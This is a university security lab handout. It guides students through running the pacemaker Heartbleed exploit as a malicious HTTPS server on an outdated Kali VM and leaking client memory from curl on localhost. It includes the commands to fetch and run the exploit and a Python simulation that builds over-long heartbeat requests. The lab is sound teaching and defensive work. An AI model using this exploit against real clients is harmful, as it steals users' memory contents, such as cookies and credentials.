Proj 11: Attacking Clients with a Malicious Heartbleed SSL Server (10 pts.)

What You Need

Purpose

The Heartbleed vulnerability in OpenSSL (CVE-2014-0160) allows a malicious HTTPS server to steal RAM from a client machine that connects to it. The bug is in OpenSSL's handling of the TLS heartbeat extension: the code trusts the length field in a heartbeat request and copies that many bytes back to the peer, so a peer that claims a large payload while actually sending a short one gets up to 64 KB of the other side's process memory in the reply. The same bug lets a client attack a server; this project runs it the other way around, with a malicious server attacking clients.

This was patched in OpenSSL 1.0.1g, but the Kali Linux machines you got on the DVD in class have an older, vulnerable version :)

Checking OpenSSL Version

To test the version, in a Terminal window, execute this command:
openssl version
The version number appears, as shown below. OpenSSL 1.0.1 through 1.0.1f are affected (1.0.0 and 0.9.8 are not, and 1.0.1g is fixed), so if the version is 1.0.1, 1.0.1f, or 1.0.1 followed by any letter before g, your OpenSSL (client or server) is likely to be vulnerable. The version string alone is not conclusive: Debian-based distributions, including Kali, sometimes backport security fixes without changing the upstream version number, so compare the build date from "openssl version -a" with the date of the fix if in doubt. The pacemaker test below is the definitive check.

Kali Linux uses a vulnerable version!

Troubleshooting

If you have a later version of openssl, which is not vulnerable, re-extract a new Kali virtual machine from the DVDs handed out in class to get a vulnerable machine.

Get the pacemaker.py Exploit Code

In a Terminal window, execute these commands:
git clone https://github.com/Lekensteyn/pacemaker.git

cd pacemaker

ls

You should see a "pacemaker.py" file, as shown below.

Troubleshooting

If that git repository is unavailable for some reason, you can get a copy from my server with these commands:
wget http://samsclass.info/124/proj14/pacemaker.pyx

mv pacemaker.pyx pacemaker.py

Run the Malicious HTTPS Server

Resize your Terminal window to use only a portion of the Kali desktop, as shown below.

In the Terminal window, execute this command:

python pacemaker.py
Pacemaker starts listening, as shown below. Leave this window open.

Testing curl

Curl on Kali is built against OpenSSL for TLS, which makes it vulnerable. You can confirm which TLS library your curl binary uses with "curl -V"; the output names the library and its version.

Open a new Terminal window and resize it to use the other half of the Kali desktop, as shown below.

In the new Terminal window, execute this command:

curl https://localhost:4433/
Curl will show a connection error, because pacemaker never completes the TLS handshake. That doesn't matter: pacemaker sends its heartbeat request early in the handshake and the vulnerable client answers it immediately, so the RAM was stolen before the error happened.

The pacemaker window fills with stolen RAM data, as shown below. The exploit worked!

In the pacemaker window, use the mouse to carefully scroll back up to see the start of the stolen RAM. Find the "Client returned 65517 (0xffed) bytes" message, as shown below. (Some versions of pacemaker show a slightly different number of bytes.)

Saving the Screen Image

Make sure your image has these required elements: Save the image with a filename of "Proj 11a from YOUR NAME".

Testing IceWeasel

In the pacemaker window, scroll to the bottom so you see the last line of stolen RAM, beginning with "ff00:".

At the top left of the Kali Linux desktop, click the round blue icon to open IceWeasel, which is Debian's rebranded build of Firefox.

Move IceWeasel to use only the lower portion of the desktop, as shown below.

In IceWeasel, type in this address and press Enter:

https://localhost:4433/
The pacemaker window shows one or more messages saying "Not vulnerable!", as shown below.

This means IceWeasel is not vulnerable. It uses Mozilla's NSS library for TLS rather than OpenSSL, so the malicious heartbeat request gets no over-long reply; pacemaker only reports a client as vulnerable when it returns more bytes than it was sent.
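The difference between the curl result ("Client returned 65517 bytes") and the IceWeasel result ("Not vulnerable!") comes down to one missing bounds check. The following simulation is an added example, not pacemaker's code and not OpenSSL's: it builds RFC 6520 heartbeat messages the way a malicious server does, models the unchecked copy in OpenSSL 1.0.1 through 1.0.1f beside the 1.0.1g check, and applies the same verdict rule pacemaker uses (did the client return more payload bytes than it was sent?). The "heap" and the secret in it are constructed stand-ins, and each heartbeat is kept in a single TLS record for simplicity; real responses are fragmented across records.

```python
"""Simulated Heartbleed exchange: malicious heartbeat request, vulnerable vs
patched client reply, and the server-side verdict. Added example; the heap
contents and secret below are constructed, not real process memory."""
import os
import struct

TLS_HEARTBEAT = 24          # TLS record content type for heartbeat (RFC 6520)
TLS_VERSION = b"\x03\x02"   # TLS 1.1 on the wire; any 1.x behaves the same here
HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16                # RFC 6520 requires at least 16 bytes of padding

# Constructed stand-in for bytes that follow the record buffer on the client's
# heap: filler, a fake session cookie, then zeros.
FAKE_HEAP = bytes(range(256)) * 40 + b"Cookie: session=SUPERSECRET123\r\n" + bytes(8000)


def build_heartbeat_record(hb_type, claimed_len, payload):
    """One TLS record carrying one heartbeat message. claimed_len is the 2-byte
    payload_length field; a malicious server sets it larger than len(payload)."""
    body = struct.pack("!BH", hb_type, claimed_len) + payload + os.urandom(PADDING)
    return struct.pack("!B2sH", TLS_HEARTBEAT, TLS_VERSION, len(body)) + body


def parse_record(record):
    """Split a TLS record into (content_type, version, body)."""
    ctype, version, length = struct.unpack("!B2sH", record[:5])
    body = record[5:5 + length]
    if len(body) != length:
        raise ValueError("truncated record")
    return ctype, version, body


def vulnerable_heartbeat_reply(record, heap_after_buffer):
    """OpenSSL 1.0.1-1.0.1f behaviour (simulated): copy payload_length bytes
    starting at the request payload, trusting the attacker-supplied length."""
    ctype, _, body = parse_record(record)
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if ctype != TLS_HEARTBEAT or hb_type != HB_REQUEST:
        return None
    heap_view = body[3:] + heap_after_buffer     # record buffer, then the heap
    leaked = heap_view[:payload_len]             # no bounds check: over-read
    return build_heartbeat_record(HB_RESPONSE, payload_len, leaked)


def patched_heartbeat_reply(record, heap_after_buffer):
    """OpenSSL 1.0.1g behaviour: the fix added
    `if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0;`
    so a request whose claimed length exceeds the record is silently dropped."""
    ctype, _, body = parse_record(record)
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if ctype != TLS_HEARTBEAT or hb_type != HB_REQUEST:
        return None
    if 1 + 2 + payload_len + PADDING > len(body):
        return None                              # dropped, no response at all
    return build_heartbeat_record(HB_RESPONSE, payload_len, body[3:3 + payload_len])


def classify_client(request, response):
    """Malicious server's verdict, like pacemaker's 'Client returned N bytes'
    vs 'Not vulnerable!'. Returns (verdict, payload bytes returned)."""
    _, _, req_body = parse_record(request)
    sent = len(req_body) - 3 - PADDING           # payload bytes actually sent
    if response is None:
        return "no heartbeat response", 0
    _, _, resp_body = parse_record(response)
    hb_type, returned = struct.unpack("!BH", resp_body[:3])
    if hb_type != HB_RESPONSE:
        return "unexpected message", 0
    return ("vulnerable" if returned > sent else "not vulnerable"), returned


def leaked_bytes(request, response):
    """Payload bytes in the reply beyond what the request actually carried."""
    _, _, req_body = parse_record(request)
    sent = len(req_body) - 3 - PADDING
    _, _, resp_body = parse_record(response)
    _, returned = struct.unpack("!BH", resp_body[:3])
    return resp_body[3 + sent:3 + returned]


def demo():
    """Run the four combinations: evil/honest request x vulnerable/patched client."""
    evil = build_heartbeat_record(HB_REQUEST, 0x4000, b"")    # claims 16384, sends 0
    honest = build_heartbeat_record(HB_REQUEST, 4, b"ping")   # claims 4, sends 4
    return {
        "vulnerable_evil": classify_client(evil, vulnerable_heartbeat_reply(evil, FAKE_HEAP)),
        "patched_evil": classify_client(evil, patched_heartbeat_reply(evil, FAKE_HEAP)),
        "vulnerable_honest": classify_client(honest, vulnerable_heartbeat_reply(honest, FAKE_HEAP)),
        "patched_honest": classify_client(honest, patched_heartbeat_reply(honest, FAKE_HEAP)),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The honest request gets a 4-byte reply from both clients, which is what pacemaker reports as a normal heartbeat. The evil request gets 16384 bytes of heap back from the vulnerable client (the fake cookie is in there) and nothing at all from the patched one, which is why the fix was a silent drop rather than an error alert.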

Saving the Screen Image

Make sure your image has these required elements: Save the image with a filename of "Proj 11b from YOUR NAME".

Turning In Your Project

Email the image to cnit.124@gmail.com with a subject of "Project 11 from YOUR NAME".


Sources

https://github.com/Lekensteyn/pacemaker


Last modified: 4-28-14 7:47 pm